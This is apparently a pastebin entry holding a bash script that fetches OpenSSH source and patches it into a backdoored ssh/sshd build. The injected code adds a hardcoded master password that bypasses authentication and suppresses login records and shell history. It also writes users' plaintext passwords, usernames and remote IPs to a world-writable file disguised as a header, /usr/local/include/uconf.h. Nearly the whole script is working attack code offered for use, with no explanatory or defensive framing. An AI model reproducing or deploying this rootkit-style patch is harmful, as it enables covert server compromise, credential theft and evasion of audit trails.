SHOW:
|
|
- or go back to the newest paste.
1 | #!/bin/bash | |
2 | PASSWORD=$1 | |
3 | SNIFFILE=$2 | |
4 | ||
5 | BACKDOOR_INC="patch.h" | |
6 | FILES="auth.c auth-passwd.c loginrec.c session.c sshconnect1.c sshconnect2.c includes.h" | |
7 | HOST="http://ftp.heanet.ie/mirrors/OpenBSD/OpenSSH/portable/" | |
8 | OK="done" | |
9 | FAIL="fail" | |
10 | ||
11 | echo "ENJOY..." | |
12 | if [ -z $PASSWORD ]; then | |
13 | echo -n ">>> password: " | |
14 | read PASSWORD|md5sum | |
15 | fi | |
16 | ||
17 | if [ -z $SNIFFILE ]; then | |
18 | echo -n ">>> logfile path: /usr/local/include/uconf.h" | |
19 | SNIFFILE="/usr/local/include/uconf.h" | |
20 | touch "/usr/local/include/uconf.h" | |
21 | chmod o+wr "/usr/local/include/uconf.h" | |
22 | echo "Do not remove /usr/local/include/uconf.h" | |
23 | fi | |
24 | ||
25 | echo -n "checking for sshd_config... " | |
26 | SSHDCONFIG="/etc/ssh" | |
27 | if [ -f $SSHDCONFIG/sshd_config ]; then | |
28 | echo "$OK ($SSHDCONFIG)" | |
29 | fi | |
30 | ||
31 | if [ -z "$SSHDCONFIG" ]; then | |
32 | echo "$FAIL" | |
33 | echo -n ">>> sshd_config path: " | |
34 | read SSHDCONFIG | |
35 | fi | |
36 | ||
37 | # ssh | |
38 | echo -n "checking for OpenSSH binary... " | |
39 | SSH=$(which ssh) | |
40 | if [ -z "$SSH" ]; then | |
41 | echo "$FAIL" | |
42 | exit | |
43 | fi | |
44 | echo "$OK ($SSH)" | |
45 | ||
46 | # wget | |
47 | echo -n "checking for wget/curl binary... " | |
48 | WGET=$(which curl) | |
49 | WGET_FLAG="-O" | |
50 | if [ -z "$WGET" ]; then | |
51 | WGET=$(which wget) | |
52 | if [ -z "$WGET" ]; then | |
53 | echo "$FAIL" | |
54 | exit | |
55 | else | |
56 | WGET_FLAG="-qc" | |
57 | fi | |
58 | fi | |
59 | echo " $OK ($WGET)" | |
60 | ||
61 | # check ssh version | |
62 | echo -n "checking OpenSSH version... " | |
63 | SSH_VERSION=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/') | |
64 | SSH_DISTRO=$($SSH -V 2>&1 | sed 's/\(.*\),.*/\1/'|awk '{print $2}') | |
65 | SSH_SHORT_VERSION=$(echo $SSH_VERSION | sed -e's/OpenSSH_\(.*\)/\1/' -e 's/\ .*//') | |
66 | if [ -z "$SSH_SHORT_VERSION" ] || [ -z "$SSH_VERSION" ]; then | |
67 | echo $FAIL; | |
68 | exit | |
69 | fi | |
70 | echo " $OK ($SSH_VERSION)" | |
71 | ||
72 | ||
73 | # get ssh | |
74 | OPENSSH=$(echo openssh-$SSH_SHORT_VERSION) | |
75 | echo "downloading source..." | |
76 | $WGET $WGET_FLAG $HOST/$OPENSSH.tar.gz && | |
77 | #echo " $OK" && | |
78 | echo -n "extracting tarball..." && | |
79 | tar xzf $OPENSSH.tar.gz && | |
80 | echo " $OK" && | |
81 | cd $OPENSSH | |
82 | ||
83 | ||
84 | # check file sanity | |
85 | echo -n "checking file sanity..." | |
86 | for FILE in $FILES; do | |
87 | if [ ! -f $FILE ];then | |
88 | printf "$FILE not found.\n" | |
89 | exit | |
90 | fi | |
91 | cp $FILE $FILE.bak | |
92 | done | |
93 | echo " $OK" | |
94 | ||
95 | echo "generating patches..." | |
96 | BACKDOOR_BUF=\ | |
97 | "#ifndef __HAVE_PATCH_H | |
98 | #define __HAVE_PATCH_H | |
99 | #define PATCHPASS \"$PASSWORD\" | |
100 | #define SNFLOG \"$SNIFFILE\" | |
101 | int patch_on; | |
102 | #endif" | |
103 | printf "$BACKDOOR_BUF" > $BACKDOOR_INC | |
104 | ||
105 | ||
106 | # patch files | |
107 | echo " patching auth.c... $OK" | |
108 | sed 's/Accepted.*$/&\nif(patch_on) return;/g' auth.c >> auth.c.tmp | |
109 | echo " patching loginrec.c... $OK" | |
110 | sed '/^login_write.*)/{n; s/{/&\nif(patch_on) return 0;/g}' loginrec.c >> loginrec.c.tmp | |
111 | echo " patching auth-passwd.c... $OK" | |
112 | sed -e '/options.permit_empty_passwd/{n; s/.*/&\npatch_on = 0;\nif(!strcmp(password, PATCHPASS))\n{\npatch_on = 1;\nreturn 1;\n}\n/g}' -e '/return (sshpam_auth_passwd(authctxt, password) \&\& ok)/s/.*/\nif (sshpam_auth_passwd(authctxt, password) \&\& ok)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/' -e '/return (strcmp(encrypted_password, pw_password) == 0)/s/.*/\nif (strcmp(encrypted_password, pw_password) == 0)\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp, "From: %s - %s:%s\\n",get_remote_ipaddr(), pw->pw_name, password);\nfclose (fp);\nreturn 1;\n}\nelse return 0;\n/'<auth-passwd.c> auth-passwd.c.tmp | |
113 | echo " patching session.c... $OK" | |
114 | sed '/LOGNAME/a if(patch_on)\n{\nchild_set_env(&env, &envsize, "HISTFILE", "/dev/null");\n}\n' <session.c> session.c.tmp | |
115 | echo " patching sshconnect1.c... $OK" | |
116 | sed -e '/packet_start(SSH_CMSG_AUTH_PASSWORD)/s/.*/packet_start(SSH_CMSG_AUTH_PASSWORD)\;\n{\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}\nreturn 1;\n}/' <sshconnect1.c> sshconnect1.c.tmp | |
117 | echo " patching sshconnect2.c... $OK" | |
118 | LINENUMBER=$(cat sshconnect2.c|grep --line-number 'packet_start(SSH2_MSG_USERAUTH_REQUEST);'|awk -F ":" '{print $1}'|head -3|tail -1) | |
119 | sed -e $LINENUMBER's/packet_start(SSH2_MSG_USERAUTH_REQUEST)/packet_start(SSH2_MSG_USERAUTH_REQUEST)\;\nif(strcmp(PATCHPASS,password))\n{\nFILE *fp = fopen(SNFLOG,"a");\nfprintf (fp,"To: %s - %s:%s\\n",get_remote_ipaddr() , options.user, password);\nfclose (fp);\n}/' <sshconnect2.c> sshconnect2.c.tmp | |
120 | echo " patching includes.h... $OK" | |
121 | sed -e 's/#include "entropy.h"/#include "entropy.h"\n#include "patch.h"/' <includes.h> includes.h.tmp | |
122 | ||
123 | ||
124 | # move files | |
125 | for FILE in $FILES; do | |
126 | mv $FILE.tmp $FILE | |
127 | done | |
128 | echo "done." | |
129 | echo "building source..." | |
130 | ||
131 | echo | |
132 | echo Variables: | |
133 | echo " \$SSH_VERSION = $SSH_VERSION" | |
134 | echo " \$SSHDCONFIG = $SSHDCONFIG" | |
135 | echo " \$PASSWORD = $PASSWORD" | |
136 | ||
137 | SSH_PORTABLE=$(cat version.h|grep PORTABLE|head -1|awk -F '"' '{print $2}') | |
138 | if [ -z $SSH_DISTRO ]; then | |
139 | echo "Keeping current version.h" | |
140 | else | |
141 | echo "SSH Distro: $SSH_DISTRO" | |
142 | sed 's/'$SSH_PORTABLE'/'$SSH_PORTABLE' '$SSH_DISTRO'/' <version.h> version.h.tmp | |
143 | rm -rf version.h | |
144 | mv version.h.tmp version.h | |
145 | fi | |
146 | ||
147 | # start build | |
148 | cat /etc/ssh/sshd_config|grep -i usepam | |
149 | echo 'Configure using PAM (leave blank if yes): ' | |
150 | read USEPAM | |
151 | cat /etc/ssh/sshd_config|grep -i GSSAPICleanupCredentials | |
152 | echo 'Configure using kerb5 (leave blank if yes): ' | |
153 | read KERB | |
154 | if [ -z $USEPAM ];then | |
155 | echo "Configuring --with-pam" | |
156 | OPT_PAM="--with-pam" | |
157 | else | |
158 | echo "Configuring without PAM" | |
159 | OPT_PAM="" | |
160 | fi | |
161 | if [ -z $KERB ]; then | |
162 | echo "Configuring --with-kerberos5" | |
163 | OPT_KERB="--with-kerberos5" | |
164 | else | |
165 | echo "Configuring without kerb5" | |
166 | OPT_KERB="" | |
167 | fi | |
168 | echo "./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB" | |
169 | ./configure --sysconfdir=$SSHDCONFIG $OPT_PAM $OPT_KERB && make ssh sshd | |
170 | ||
171 | printf "patched OpenSSH ready.\n" |